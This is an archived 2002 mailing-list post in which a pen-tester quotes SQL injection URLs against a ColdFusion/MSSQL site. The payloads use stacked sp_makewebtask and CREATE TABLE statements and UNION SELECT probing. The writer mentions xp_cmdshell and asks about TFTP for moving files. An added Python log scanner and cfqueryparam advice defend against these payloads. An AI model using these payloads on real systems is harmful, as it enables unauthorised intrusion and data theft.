SQL INJECTION IN Coldfusion

From: Mr Ro (vnmrro@yahoo.com)
Date: Thu Sep 12 2002 - 13:26:39 EDT


Hello pen-tester,
I am dealing with a pen-test against a CFM server with
MSSQL as backend. It is vulnerable to direct SQL
injection.
I figured out that I can create, drop... table, execute
xp_cmdshell, sp_makewebtask, so I submit:
http://mysite/file.cfm?id=4546;exec sp_makewebtask
"C:\winnt\temp\blah.htm","select * from
master..sysmessages"--
It's okay, and I want to get "C:\winnt\temp\blah.htm".
I submit:
http://mysite/file.cfm?id=4567;create table blah (line
varchar(8000))--
and then, I submit:
http://mysite/file.cfm?id=4567 UNION SELECT line from
mrro--
It returns an error complaining that "All queries in an
SQL statement containing a UNION operator must have an
equal number of expressions in their target lists." so
I keep adding "line" in my request url
(http://mysite/file.cfm?id=4567 UNION SELECT
line,line,line from mrro--), finally it returns an
error message like this:
"[Microsoft][ODBC SQL Server Driver][SQL Server]The
text, ntext, or image data type cannot be selected as
DISTINCT."
Question here: who can explain to me what happened?

I know there is another way to download or upload
files using "tftp", so is there any free "tftp" server
for me to use instead of installing a new one?
Thanks for reading.
Best regards
mrro
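
From the defender's side, every request quoted in the message above carries something other than an integer in `id`, which makes them easy to flag in web server logs. The following is an added example, not part of the original post: it assumes `id` is only ever meant to be a short decimal integer, and the sample request lines and rule names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Constructed request targets modelled on the URLs in the post, percent-encoded
# the way they would typically appear in a web server access log.
SAMPLE_REQUESTS = [
    "/file.cfm?id=4546",
    "/file.cfm?id=4546%3Bexec%20sp_makewebtask%20%22C%3A%5Cwinnt%5Ctemp%5Cblah.htm"
    "%22%2C%22select%20*%20from%20master..sysmessages%22--",
    "/file.cfm?id=4567;create+table+blah+(line+varchar(8000))--",
    "/file.cfm?id=4567%20UNION%20SELECT%20line,line,line%20from%20mrro--",
    "/file.cfm?page=2&id=17",
]

# Hypothetical rule names; each pattern is checked against the decoded value.
RULES = [
    ("stacked-statement", re.compile(r";")),
    ("union-select", re.compile(r"\bunion\b.*\bselect\b", re.I | re.S)),
    ("mssql-procedure", re.compile(r"\b(?:xp_cmdshell|sp_makewebtask)\b", re.I)),
    ("sql-comment", re.compile(r"--|/\*")),
]

# Match `id` only as a whole parameter name (not `pid=`), without relying on
# parse_qs, whose handling of `;` as a separator differs across Python versions.
ID_PARAM = re.compile(r"(?:^|&)id=([^&]*)", re.I)

def classify(request_target):
    """Return findings for the `id` parameter; an empty list means clean."""
    match = ID_PARAM.search(urlsplit(request_target).query)
    if match is None:
        return []
    value = unquote_plus(match.group(1))
    # Assumption: the application only ever expects a short decimal integer.
    if re.fullmatch(r"[0-9]{1,10}", value):
        return []
    return ["non-integer-id"] + [name for name, rx in RULES if rx.search(value)]

def scan(requests):
    """Map each flagged request target to its findings."""
    flagged = {}
    for target in requests:
        findings = classify(target)
        if findings:
            flagged[target] = findings
    return flagged

if __name__ == "__main__":
    for target, findings in scan(SAMPLE_REQUESTS).items():
        print(", ".join(findings), "<-", target)
```

Detection of this kind complements the actual fix, which is to bind `id` as a typed parameter (in ColdFusion, `cfqueryparam` with an integer `cfsqltype`) so the value never reaches the SQL parser as text.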




This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:53:25 EDT